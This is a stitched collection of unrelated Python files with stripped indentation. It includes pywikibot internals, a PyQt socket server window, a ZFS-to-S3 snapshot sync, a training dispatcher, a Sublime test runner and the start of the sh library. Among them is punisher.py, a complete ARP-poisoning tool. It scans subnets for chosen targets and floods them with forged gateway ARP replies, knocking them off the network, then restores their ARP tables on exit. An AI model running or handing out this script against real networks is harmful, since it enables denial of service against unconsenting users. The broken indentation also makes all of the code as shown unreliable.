# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') \
or not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{}' "
'for {}.'.format(ending, label))
def __init__(self, page, site: Optional[DataSite] = None):
"""
Create a new _WbDataPage object.
:param page: page containing the data
:type page: pywikibot.Page
:param site: The Wikibase site
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self) -> str:
"""
Convert the data to the value required by the Wikibase API.
:return: title of the data page incl. namespace
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name: str, site: DataSite):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
:param page_name: page name from Wikibase value
:param site: The Wikibase site
:rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a geo-shape repository.
:param site: The Wikibase site
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbGeoShape.
:param site: The Wikibase site
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a tabular-data repository.
:param site: The Wikibase site
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbTabularData.
:param site: The Wikibase site
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
This will prevent the bot from breaking completely when a new type
is introduced.
    This data type is just a JSON container.
*New in version 3.0.*
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
:param json: Wikibase JSON
"""
self.json = json
def toWikibase(self) -> dict:
"""
Return the JSON object for the Wikibase API.
:return: Wikibase JSON
"""
return self.json
@classmethod
def fromWikibase(cls, json: dict):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
:param json: Wikibase JSON
:rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
@cache
def _code_fam_from_url(url: str, name: Optional[str] = None):
"""Set url to cache and get code and family from cache.
Site helper method.
:param url: The site URL to get code and family
:param name: A family name used by AutoFamily
"""
matched_sites = []
    # Iterate through all families and check which applies to
    # the given URL
for fam in _config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
if not name: # create a name from url
name = urlparse(url).netloc.split('.')[-2]
name = removesuffix(name, 'wiki')
family = AutoFamily(name, url)
matched_sites.append((family.code, family))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{}": {} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
return matched_sites[0]
@_deprecate_arg('sysop', True)
def Site(code: Optional[str] = None, fam=None, user: Optional[str] = None, *,
interface=None,
url: Optional[str] = None) -> Union[APISite, DataSite, ClosedSite]:
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
Creating the default site using config.mylang and config.family::
site = pywikibot.Site()
Override default site code::
site = pywikibot.Site('fr')
Override default family::
        site = pywikibot.Site(fam='wikisource')
Setting a specific site::
site = pywikibot.Site('fr', 'wikisource')
which is equal to::
site = pywikibot.Site('wikisource:fr')
    :Note: An already created site is cached and a new variable points to
the same object if interface, family, code and user are equal:
>>> import pywikibot
>>> site_1 = pywikibot.Site('wikisource:fr')
>>> site_2 = pywikibot.Site('fr', 'wikisource')
>>> site_1 is site_2
True
>>> site_1
APISite("fr", "wikisource")
``APISite`` is the default interface. Refer :py:obj:`pywikibot.site` for
other interface types.
**Never create a site object via interface class directly.**
Always use this factory method.
:param code: language code (override config.mylang)
code may also be a sitename like 'wikipedia:test'
:param fam: family name or object (override config.family)
:type fam: str or pywikibot.family.Family
:param user: bot user name to use on this site (override config.usernames)
:param interface: site class or name of class in :py:obj:`pywikibot.site`
(override config.site_interface)
:type interface: subclass of :py:obj:`pywikibot.site.BaseSite` or string
    :param url: Instead of code and fam, try to get a Site based on the
        URL. Still requires that the family supporting that URL exists.
:raises ValueError: URL and pair of code and family given
:raises ValueError: Invalid interface name
"""
_logger = 'wiki'
if url:
# Either code and fam or url with optional fam for AutoFamily name
if code:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url, fam)
elif code and ':' in code:
if fam:
raise ValueError(
'sitename OR a pair of code and family name '
'should be provided')
fam, _, code = code.partition(':')
else:
# Fallback to config defaults
code = code or _config.mylang
fam = fam or _config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = {}
if '*' in _config.usernames: # T253127: usernames is a defaultdict
code_to_user = _config.usernames['*'].copy()
code_to_user.update(_config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
if not isinstance(interface, type):
# If it isn't a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface={}'.format(interface.__name__))
user = normalize_username(user)
key = '{}:{}:{}:{}'.format(interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user)
debug("Instantiated {} object '{}'"
.format(interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site {} instantiated using different code "{}"'
.format(_sites[key], code), UserWarning, 2)
return _sites[key]
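# Illustrative sketch (not part of the original module): the spellings accepted
# by the Site() factory. The codes, family and URL below are only examples, and
# a configured user-config is assumed when this is actually called.
def _example_site_lookups():
    by_parts = Site('fr', 'wikisource')
    by_sitename = Site('wikisource:fr')
    by_url = Site(url='https://fr.wikisource.org/wiki/Main_Page')
    # All three should resolve to the same cached APISite instance.
    return by_parts is by_sitename is by_url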
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Category,
Claim,
FilePage,
ItemPage,
Link,
Page,
PropertyPage,
SiteLink,
User,
html2unicode,
url2unicode,
)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=round(remainingPages * _config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > _config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
if _putthread is not threading.current_thread():
while (_putthread.is_alive()
and (page_put_queue.qsize() > 0
or page_put_queue_busy.qsize() > 0)):
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {} pages remaining in the queue. '
'Estimated time remaining: {}\nReally exit?'
.format(*remaining()),
default=False, automatic_quit=False):
# delete the put queue
with page_put_queue.mutex:
page_put_queue.all_tasks_done.notify_all()
page_put_queue.queue.clear()
page_put_queue.not_full.notify_all()
break
# only need one drop() call because all throttles use the same global pid
with suppress(IndexError):
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
page_put_queue_busy.put(None)
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
page_put_queue_busy.get()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.is_alive():
with page_put_queue.mutex, suppress(AssertionError, RuntimeError):
_putthread.start()
page_put_queue.put((request, args, kwargs))
# queue to hold pending requests
page_put_queue = Queue(_config.max_queue_size)
# queue to signal that async_manager is working on a request. See T147178.
page_put_queue_busy = Queue(_config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
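# Illustrative sketch (not part of the original module): any callable can be
# queued through async_request(); async_manager() then runs it on the
# background Put-Thread and marks the queue task done once it returns.
def _example_async_request():
    def job(title, text):
        output('queued save of {} ({} characters)'.format(title, len(text)))
    async_request(job, 'Sandbox', 'Hello world')
    # _flush() (registered with atexit) later drains anything still queued.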
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper.add_deprecated_attr('config2', replacement_name='pywikibot.config',
since='20210426')
wrapper.add_deprecated_attr('__release__', __version__,
replacement_name='pywikibot.__version__',
since='20200707')
wrapper.add_deprecated_attr('showHelp', show_help,
since='20200705')
wrapper.add_deprecated_attr(
'unicode2html', replacement_name='pywikibot.tools.chars.string2html',
since='6.2.0')
# This module aliases many (but not all) pywikibot.exception classes and one
# from pywikibot.data.api. Use of these aliases is deprecated. When removed
# we can drop them from both our import and __all__ listing.
EXCEPTION_CLASSES = {
n for n, _ in inspect.getmembers(exceptions, inspect.isclass)
}
EXCEPTION_CLASSES.add('UploadWarning')
EXCEPTION_CLASSES.update(DEPRECATED_EXCEPTIONS.keys())
for name in __all__:
if name in EXCEPTION_CLASSES:
if name in DEPRECATED_EXCEPTIONS:
replacement = DEPRECATED_EXCEPTIONS[name]
elif name == 'UploadWarning':
replacement = 'UploadError'
else:
replacement = name
wrapper.add_deprecated_attr(
name,
replacement_name='pywikibot.exceptions.{}'.format(replacement),
since='20210424'
)
|
socket_server_window.py
|
"""
@Time : 2020/1/21 15:13
@Author : weijiang
@Site :
@File : socket_server_window.py
@Software: PyCharm
"""
import sys
from threading import Thread
from view.socker_server_window import Ui_Form
from PyQt5.QtWidgets import QWidget, QApplication
from util.common_util import read_qss, SUPER_DIR, hint_dialog, APP_ICON
from util.style import CAL_PUSHBUTTON_STYLE, VERTICAL_SCROLL_BAR_STYLE
from util.socket_model import TCPSocketServer
class SocketServerWindow(Ui_Form, QWidget):
def __init__(self):
super(SocketServerWindow, self).__init__()
self.setupUi(self)
self.init_ui()
self.init_slot()
def init_ui(self):
self.tcp_checkBox.setChecked(True)
self.tcp_checkBox.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/checkbox_qss.qss'))
self.udp_checkBox.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/checkbox_qss.qss'))
self.start_server_pushButton.setStyleSheet(CAL_PUSHBUTTON_STYLE)
self.open_folder_pushButton.setStyleSheet(CAL_PUSHBUTTON_STYLE)
self.host_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.port_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.save_path_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.textBrowser.verticalScrollBar().setStyleSheet(VERTICAL_SCROLL_BAR_STYLE)
def init_slot(self):
self.start_server_pushButton.clicked.connect(self.start_server)
def start_server(self):
if self.tcp_checkBox.isChecked():
try:
host = self.host_lineEdit.text()
port = self.port_lineEdit.text()
if '' in [port, host]:
                    hint_dialog(self, APP_ICON, 'Notice', 'Please enter the required server information!')
return
sock = TCPSocketServer(host=host, port=int(port))
sock.send_info_signal.connect(self.display_socket_info)
th = Thread(target=sock.star_server)
th.setDaemon(True)
th.start()
self.textBrowser.append('<span style="color: green">>>>bind host {} and port {}</span>'.format(host,
port))
self.textBrowser.append('<span style="color: green">>>>listening...</span>')
except Exception as e:
print(e.args)
import traceback
traceback.print_exc()
else:
pass
def display_socket_info(self, msg):
self.textBrowser.append(msg)
if __name__ == '__main__':
app = QApplication(sys.argv)
win = SocketServerWindow()
win.show()
sys.exit(app.exec_())
|
s3.py
|
import os
import sys
from cStringIO import StringIO
from collections import namedtuple
from zsync import Sync, Pipeable, Receivable
from zsync.uploader import Uploader
from zsync.downloader import Downloader
from zsync.snapshot import Snapshot
from multiprocessing import Process, Pipe
class S3(Sync):
"""
Sends and receives ZFS snapshots from S3
"""
def __init__(self, data, log):
super(S3, self).__init__(data, log)
def downloader(self, bucket, key, fp):
"""
Downloads to a stream
"""
fp = os.fdopen(fp, 'w')
AWS_ACCESS_KEY = self.args.access_key or os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = self.args.secret_key or os.environ['AWS_SECRET_KEY']
CHUNK_SIZE = self.args.size
CONCURRENCY = self.args.c
Downloader(AWS_ACCESS_KEY, AWS_SECRET_KEY, CHUNK_SIZE, CONCURRENCY).download(fp, bucket, key)
    def _send_full_snapshot(self, dataset, destination, first_snapshot):
        """
        Retrieves a snapshot and passes it to a pipe from which zfs receive reads
        """
key = "/".join(self.data.path)
key = key[1:]
key += "/" + self.data.dataset + "@" + first_snapshot
self.log.info("Running send from bucket=%s, key=%s", self.data.bucket, key)
if self.args.dryrun:
sys.stdout.write("s3cmd get s3://%s/%s - " % (self.data.bucket, key))
else:
pipeout, pipein = os.pipe()
downloader_process = Process(target=self.downloader, args=(self.data.bucket, key, pipein))
pipeout = os.fdopen(pipeout)
downloader_process.start()
FakePopen = namedtuple('FakePopen', ['stdout'])
data = FakePopen(stdout=pipeout)
destination.receive(data, dataset, first_snapshot)
downloader_process.join()
def _send_incremental_snapshot(self, dataset, destination, first_snapshot,
second_snapshot):
"""
        There are no incremental snapshots from S3, so it falls back to the
        full snapshot.
        """
        self._send_full_snapshot(dataset, destination, second_snapshot)
def _send_full_volume(self, until_snapshot, destination):
"""
Sends a full volume snapshot from S3 to a different destination.
        Captures all snapshots that need to be sent, then removes all of them
        except the last one, mimicking the effect of a proper zfs send.
"""
local_snapshot_manager = Snapshot.from_context(self)
destination_strategy = Snapshot.from_context(destination)
destination_dataset = destination.data.dataset
# get latest snapshot from the destination
latest_snapshot = destination_strategy.get_latest_snapshot(destination_dataset)
        # get local snapshots between the destination's latest snapshot and the given snapshot
all_snapshots = local_snapshot_manager.get_snapshots_between(self.data.dataset, latest_snapshot, until_snapshot)
self._send_incremental_volume(until_snapshot, destination)
if len(all_snapshots) > 1:
all_snapshots = all_snapshots[:-1]
for snapshot in all_snapshots:
destination.destroy(snapshot)
def receive(self, source, dataset, snapshot_name):
"""
Puts a snapshot in S3 using Uploader
"""
key = "/".join(self.data.path)
key = key[1:]
key += "/" + self.data.dataset + "@" + snapshot_name
if self.args.dryrun:
sys.stdout.write(" | s3cmd put - s3://%s/%s\n" % (self.data.bucket, key))
else:
self.log.info("Receiving to s3 to bucket=%s, key=%s", self.data.bucket, key)
AWS_ACCESS_KEY = self.args.access_key or os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = self.args.secret_key or os.environ['AWS_SECRET_KEY']
CHUNK_SIZE = self.args.size
CONCURRENCY = self.args.c
Uploader(
AWS_ACCESS_KEY,
AWS_SECRET_KEY,
CHUNK_SIZE,
CONCURRENCY,
).upload(source.stdout, self.data.bucket, key, self.args.storage_class)
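# Illustrative sketch (not part of the original module): the os.pipe()/FakePopen
# trick used by _send_full_snapshot, reduced to a local producer so it can be
# exercised without S3. A child process writes into the pipe; the read end is
# wrapped in a namedtuple that mimics subprocess.Popen just enough for a
# receiver that only reads ``.stdout``.
def _example_pipe_to_fake_popen():
    def producer(write_fd):
        out = os.fdopen(write_fd, 'w')
        out.write('pretend this is a zfs send stream\n')
        out.close()
    read_fd, write_fd = os.pipe()
    child = Process(target=producer, args=(write_fd,))
    child.start()
    os.close(write_fd)  # the parent must close its copy so the reader sees EOF
    FakePopen = namedtuple('FakePopen', ['stdout'])
    fake = FakePopen(stdout=os.fdopen(read_fd))
    data = fake.stdout.read()
    child.join()
    return data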
|
dispatch.py
|
#!/usr/bin/env python3
"""
This runs multiple copies of train.py in parallel, one per worker.
"""
import sys
from contextlib import contextmanager
import multiprocessing
config = dict(
seed=42,
task="ImageNet",
model_name="ResNet_EvoNorm18",
data_split_method="dirichlet",
non_iid_alpha=1.0,
num_epochs=200,
batch_size=32, # per worker
algorithm="gossip",
overlap_communication=True,
topology="ring",
base_optimizer="SGD",
learning_rate=0.16,
num_lr_warmup_epochs=5,
lr_schedule_milestones=[(150, 0.1), (180, 0.1)],
momentum=0.0,
weight_decay=0.0001,
test_interval=4,
log_verbosity=1,
distributed_backend="gloo",
distributed_rank=0,
distributed_world_size=4, # 1 = turn off
distributed_init_file=None,
gpus_per_node=1,
)
def worker(rank):
import train
# Override config from train.py
for key in list(train.config.keys()):
del train.config[key]
for key, value in config.items():
train.config[key] = value
train.config["distributed_rank"] = rank
train.output_dir = output_dir
train.log_metric = log_metric
train.log_info = log_info
train.log_runtime = log_runtime
with print_prefix(f"Worker {rank}"):
train.main()
def main():
num_workers = config["distributed_world_size"]
processes = [
multiprocessing.Process(target=worker, args=(i,)) for i in range(num_workers)
]
for p in processes:
p.start()
for p in processes:
p.join()
output_dir = "output.tmp"
def log_info(info_dict):
"""Add any information to MongoDB
This function will be overwritten when called through run.py"""
pass
def log_metric(name, values, tags={}):
"""Log timeseries data
This function will be overwritten when called through run.py"""
value_list = []
for key in sorted(values.keys()):
value = values[key]
value_list.append(f"{key}:{value:7.3f}")
values = ", ".join(value_list)
tag_list = []
for key, tag in tags.items():
tag_list.append(f"{key}:{tag}")
tags = ", ".join(tag_list)
print("{name:30s} - {values} ({tags})".format(name=name, values=values, tags=tags))
@contextmanager
def print_prefix(prefix):
global is_new_line
orig_write = sys.stdout.write
is_new_line = True
def new_write(*args, **kwargs):
global is_new_line
if args[0] == "\n":
is_new_line = True
elif is_new_line:
orig_write("[" + str(prefix) + "]: ")
is_new_line = False
orig_write(*args, **kwargs)
sys.stdout.write = new_write
yield
sys.stdout.write = orig_write
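# Illustrative sketch (not part of the original script): print_prefix() swaps
# sys.stdout.write so every fresh line is tagged with the worker name, which is
# what keeps the interleaved output of the spawned workers readable.
def _example_print_prefix():
    with print_prefix("Worker 0"):
        print("loading data")
        print("starting training")
    # Expected console output:
    #   [Worker 0]: loading data
    #   [Worker 0]: starting training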
def log_runtime(label, mean_time, std, instances):
"""This function will be overwritten when called through run.py"""
pass
if __name__ == "__main__":
main()
|
punisher.py
|
import scapy.all as scapy
import argparse
import multiprocessing
import threading
import time
CLIENTS = {}
SENT_PACKETS = 0
SEMAPHORE = 1
DOWN = threading.Event()
def scan_mac(mac, net):
mac = to_dict(mac)
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=net)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = {x[1].psrc: {'ip': x[1].psrc, 'mac': x[1].hwsrc,} for x in ans if x[1].hwsrc in mac}
return clients
def scan_mac_get_ip(mac, net):
mac = to_dict(mac)
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=net)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = [x[1].psrc for x in ans if x[1].hwsrc in mac]
return clients
def scan(ip):
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=ip)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = {x[1].psrc: {'ip': x[1].psrc, 'mac': x[1].hwsrc,} for x in ans}
return clients
def get_own_ips():
return [x[4] for x in scapy.conf.route.routes if x[2] != '0.0.0.0']
def get_mac(ip):
return list(scan(ip).values())[0]['mac']
def update_clients(args):
try:
global CLIENTS, SEMAPHORE
while True:
            while SEMAPHORE == 0 and not DOWN.is_set():
time.sleep(1)
if DOWN.is_set():
break
SEMAPHORE -= 1
clients = {}
for target in args.target:
clients.update(scan(target))
for net in args.subnet:
clients.update(scan_mac(args.target_mac, net))
exclude_ips = get_own_ips()
exclude_ips = exclude_ips + args.gateway + args.exclude
for net in args.subnet:
scanned_mac = scan_mac_get_ip(args.exclude_mac, net)
exclude_ips = exclude_ips + scanned_mac
for ip in exclude_ips:
if ip in clients:
del clients[ip]
CLIENTS = clients
SEMAPHORE += 1
DOWN.wait(5 * args.interval)
except Exception as e:
print(e)
DOWN.set()
def sucker_punch(args):
try:
global SEMAPHORE, SENT_PACKETS
while True:
            while SEMAPHORE == 0 and not DOWN.is_set():
time.sleep(1)
if DOWN.is_set():
break
SEMAPHORE -= 1
for client in CLIENTS:
if DOWN.is_set():
SEMAPHORE += 1
break
for i in range(len(args.gateway)):
packet = scapy.ARP(op='is-at', psrc=args.gateway[i], hwsrc=CLIENTS[client]['mac'], pdst=CLIENTS[client]['ip'], hwdst=CLIENTS[client]['mac'])
scapy.send(packet, verbose=False)
SENT_PACKETS += 1
print('\r[+] Packets sent: {}'.format(SENT_PACKETS), end='')
SEMAPHORE += 1
DOWN.wait(args.interval)
except Exception as e:
print(e)
DOWN.set()
def run_away(args):
gateway_macs = [get_mac(gateway) for gateway in args.gateway]
for client in CLIENTS:
[
scapy.send(
scapy.ARP(op='is-at', psrc=args.gateway[i], hwsrc=gateway_macs[i], pdst=CLIENTS[client]['ip'], hwdst=CLIENTS[client]['mac']),
verbose=False, count=5, inter=0.2
)
for i in range(len(gateway_macs))
]
def disarm():
while True:
if DOWN.is_set():
break
if input() == 'quit':
DOWN.set()
break
def read_file(file):
ret = []
try:
with open(file, 'r') as f:
ret = [line.rstrip('\n') for line in f]
except:
pass
return ret
def to_dict(lst):
    res = {item: True for item in lst}
return res
if __name__ == "__main__":
parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--subnet', default=None, help='path to a file containing subnets')
    parser.add_argument('-g', '--gateway', default=None, help='path to a file containing gateway IPs')
    parser.add_argument('-t', '--target', default=None, help='path to a file containing target IPs')
    parser.add_argument('-e', '--exclude', default=None, help='path to a file containing IPs to exclude')
    parser.add_argument('-tm', '--target-mac', default=None, help='path to a file containing target MACs')
    parser.add_argument('-em', '--exclude-mac', default=None, help='path to a file containing MACs to exclude')
    parser.add_argument('-i', '--interval', default=10, type=float, help='interval in seconds between ARP packets')
args = parser.parse_args()
assert(args.gateway is not None and (args.target is not None or args.target_mac is not None))
try:
t_start = time.time()
args.subnet = read_file(args.subnet)
args.gateway = read_file(args.gateway)
args.target = read_file(args.target)
args.exclude = read_file(args.exclude)
args.target_mac = read_file(args.target_mac)
args.exclude_mac = read_file(args.exclude_mac)
t0 = threading.Thread(target=disarm, args=())
t1 = threading.Thread(target=update_clients, args=(args,))
t2 = threading.Thread(target=sucker_punch, args=(args,))
t0.start()
t1.start()
t2.start()
except Exception as e:
print(e)
finally:
t0.join()
t1.join()
t2.join()
run_away(args)
t_finish = time.time()
print('Time elapsed: {}'.format(t_finish - t_start))
|
__init__.py
|
import time
import threading
import unittest
import re
import sublime
LAST_COMMIT_TIMESTAMP = '2014-11-28 20:54:15'
LAST_COMMIT_VERSION = re.sub(r'[ :\-]', '.', LAST_COMMIT_TIMESTAMP)
CLIENT_ID = ''
CLIENT_SECRET = ''
class StringQueue():
def __init__(self):
self.lock = threading.Lock()
self.queue = ''
def write(self, data):
self.lock.acquire()
self.queue += data
self.lock.release()
def get(self):
self.lock.acquire()
output = self.queue
self.queue = ''
self.lock.release()
return output
def flush(self):
pass
def runner(window, test_classes):
"""
Runs tests in a thread and outputs the results to an output panel
:param window:
A sublime.Window object to use to display the results
:param test_classes:
A unittest.TestCase class, or list of classes
"""
output = StringQueue()
panel = window.get_output_panel('package_control_tests')
panel.settings().set('word_wrap', True)
window.run_command('show_panel', {'panel': 'output.package_control_tests'})
threading.Thread(target=show_results, args=(panel, output)).start()
threading.Thread(target=do_run, args=(test_classes, output)).start()
def do_run(test_classes, output):
if not isinstance(test_classes, list) and not isinstance(test_classes, tuple):
test_classes = [test_classes]
suite = unittest.TestSuite()
loader = unittest.TestLoader()
for test_class in test_classes:
suite.addTest(loader.loadTestsFromTestCase(test_class))
unittest.TextTestRunner(stream=output, verbosity=1).run(suite)
output.write("\x04")
def show_results(panel, output):
def write_to_panel(chars):
sublime.set_timeout(lambda: panel.run_command('package_control_insert', {'string': chars}), 10)
write_to_panel(u'Running Package Control Tests\n\n')
while True:
chars = output.get()
if chars == '':
time.sleep(0.1)
continue
if chars[-1] == "\x04":
chars = chars[0:-1]
write_to_panel(chars)
break
write_to_panel(chars)
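# Illustrative sketch (not part of the original module): StringQueue is just a
# thread-safe, flushable write target, so it can also act as the stream of a
# plain TextTestRunner outside of Sublime. The test case below is made up.
def _example_stringqueue_runner():
    class _DummyTest(unittest.TestCase):
        def test_nothing(self):
            self.assertTrue(True)
    output = StringQueue()
    suite = unittest.TestLoader().loadTestsFromTestCase(_DummyTest)
    unittest.TextTestRunner(stream=output, verbosity=1).run(suite)
    return output.get()  # the buffered test report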
|
sh.py
|
#===============================================================================
# Copyright (C) 2011-2012 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.03"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower():
raise ImportError("sh 1.0 is currently only supported on linux and osx. \
please install pbs 0.109 (http://pypi.python.org/pypi/pbs) for windows support.")
import sys
IS_PY3 = sys.version_info[0] == 3
import traceback
import os
import re
from glob import glob as original_glob
from types import ModuleType
from functools import partial
import inspect
import time as _time
if IS_PY3:
from io import StringIO
from io import BytesIO as cStringIO
from queue import Queue, Empty
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from Queue import Queue, Empty
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
import errno
import warnings
import pty
import termios
import signal
import select
import atexit
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
# this is ugly, but we've added a module-level logging kill switch. the reason
# for it (vs letting the user disable/enable logging through the logging
# module's facilities) is because to enable/disable logging using logging
# facilities, modules need to have their loggers (retrieved with
# logging.getLogger()) named using dot notation. so for example:
#
# log = logging.getLogger("sh.process")
#
# we don't do that though, because we cram a lot of info into the logger name
# for example, a logger name may be
# "<Process 1373 ['/usr/bin/python3.2', '/tmp/tmp2c18zp']>"
# because of this, a user can't disable our loggers (because we lack dot
# notation), and I won't add dot notation because I can't include all the
# data i need in my logger name. so this is really a shortcoming of the
# logging module.
logging_enabled = False
if IS_PY3:
raw_input = input
unicode = str
basestring = str
class ErrorReturnCode(Exception):
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
        if self.stdout is None: tstdout = "<redirected>".encode()  # bytes, so .decode() below works
else:
tstdout = self.stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(tstdout)
if out_delta:
tstdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
        if self.stderr is None: tstderr = "<redirected>".encode()  # bytes, so .decode() below works
else:
tstderr = self.stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(tstderr)
if err_delta:
tstderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg = "\n\n RAN: %r\n\n STDOUT:\n%s\n\n STDERR:\n%s" %\
(full_cmd, tstdout.decode(), tstderr.decode())
super(ErrorReturnCode, self).__init__(msg)
class CommandNotFound(Exception): pass
